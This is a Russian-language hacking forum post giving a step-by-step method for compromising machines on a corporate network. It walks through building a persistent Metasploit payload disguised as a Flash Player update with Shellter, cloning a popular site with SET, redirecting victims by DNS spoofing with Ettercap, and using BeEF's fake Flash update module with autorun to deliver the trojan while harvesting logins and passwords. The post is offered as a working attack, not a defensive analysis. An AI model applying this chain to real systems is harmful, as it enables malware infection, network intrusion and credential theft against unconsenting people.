Здравствуйте, на сей раз хочу поделится с вами личным (свинским) методом заражения (корпоративной сети)
Вынашивал сей метод долго... продумывал каждый шаг и поэтому статья не будет короткой как обычно.
Из неё Мы вспомним старые, добрые инструменты такие как Beef-xss framework, Ettercap, SET,shellter ну и классика MSF или не раз мной и здесь упомянутый другими обитателями этого замечательного борда EMPIRE.
Возможно прочитав её Вы почерпнете для себя что то новое, а именно не знакомые функции в старых добрых инструментов.
Важным плюсом моей методики является то что Вам не придется что-то впаривать жертве подсовывать и т.д. при хорошем раскладе она сама все сделает!)))
Водопад: отдельная благодарность доброму человеку который подсказал на конец как сюда вставлять фото! И спасибо что приняли меня в отряд "серых" уверяю Вас что Вы не ошиблись приняв такое решение. Так же поводом для написания статьи послужил этот ролик если бы не он, она бы просто вышла позднее! (по сути статья так и создавалась) смотреть до 2:20
Предположим что Вы инсайдер или прорвали первую линию обороны взломав вражескую беспроводную сеть и Вас мучают вопросы как быть дальше, ответы есть и не только в этой статье, а например такие как eternalblue и т.д. но что делать если чужие машины уже про патчены и експлойты их не пробивают!? Ответ прост, читаем дальше..
Итак начнем с создания и маскировки нашего малваря, а именно это будет флэш-плеер от всем известной компании сами знаете какой. Показывать я буду на примере MSF а то Вы наверняка уже думаете " че он пристал к этому EMPIRE как лишай да пионерки"
вот скрины его создания с дополнительной функцией persistence
Далее смешиваем его с flashplayer -ом в shellter
в итоге получаем зараженный ФП на вирусы сканил, на момент написания статьи он чист !
Далее подымаем сервис апач и заводим утилиту SET с её помощью клонируем популярный сайт соц. сети или-же сайт который пользуется спросом в корпоративной (вражеской) сети! На этом моменте заострять внимание я думаю не стоит инфы полно везде.. попутно телепортируем наш зараженный ФП в паку сервиса апач.
Настройка сети под себя:
Идем в папку: cd /etc/ettercap/ там лежат файлы конфигурированния (настройки) этой утилиты, а именно нас интересует два файла etter.conf и etter.dns открываем в nano | leafpad файл etter.conf
ставим значение "0"
сохраняем и закрываем его.
Открываем второй файл etter.dns
3-ю строчку можно удалить, сохраняем и закрываем.
Запускаем: ettercap -G
Запусти его по позже !!! У нас остался еще один важный инструмент BEEF-XSS . Итак поясняю что мы сделали, как только жертвы будут заходить с сети на наш фэйк-сайт который мы прописали в настройках они будут автоматом попадать к нам!))) Следовательно мы не только заразим машину но еще бонусом получим логин пароль от аккаунтов!)) Лично меня такая аттака устраивает на все 100! Едем дальше...
НАСТРОЙКА BEEF:
Идем в папку: cd /usr/share/beef-xss/modules/social_engineering/fake_flash_update
там есть файл config.yaml под строчкой fake_flash_update: вписываем: autorun: true
Cледуещее что нам нужно сделать это вписать строчку в код файла который мы создали в SET-e и находится он в сервисе апач /var/www/html/ вот эта строчка <script src="
Ссылка скрыта от гостей
"></script> Запускаем BEEF он выдаст инфу как попасть в панель управления>
Ссылка скрыта от гостей
логин: "beef" пароль такой же! Там находим соц.инж / fake flash update настраиваем под себя текст, время появления окна о том что "вы не можете попасть на страницу т.к. ваш ФП устарел" и прописываем путь до Вашего ФП чтобы жертва могла его скачать опять же у нас!))
Запуск:
apache2>SET>Ettercap>BEEF>MSF>
ждем сессий в метасплойте/империи и логинов паролей в СЭТ-е!
ПРИВЕТ! , Нубам для Вас здесь есть над чем подумать!)
и ХРЮ-ХРЮ-ХРЯ-ХРЮ.......хрю.........хру.......хру
